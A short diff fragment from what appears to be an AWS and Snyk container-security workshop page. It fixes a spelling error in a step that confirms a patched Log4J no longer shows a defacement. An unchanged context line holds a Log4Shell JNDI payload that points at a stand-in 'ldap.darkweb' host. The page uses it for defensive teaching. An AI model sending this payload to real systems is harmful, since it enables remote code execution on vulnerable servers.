aws-samples/aws-modernization-with-snyk-container-security/content/40_Secure_Application/44_redeploy_verify_fix.md

 ${jndi:ldap://ldap.darkweb:80/#Vandalize}
 ```

-The page will not show the graphiti because the newer version on Log4J no longer is vulnerable!
+The page will not show the graffiti because the newer version on Log4J no longer is vulnerable!

 ![todolist-fixed](/images/todolist-fixed.png)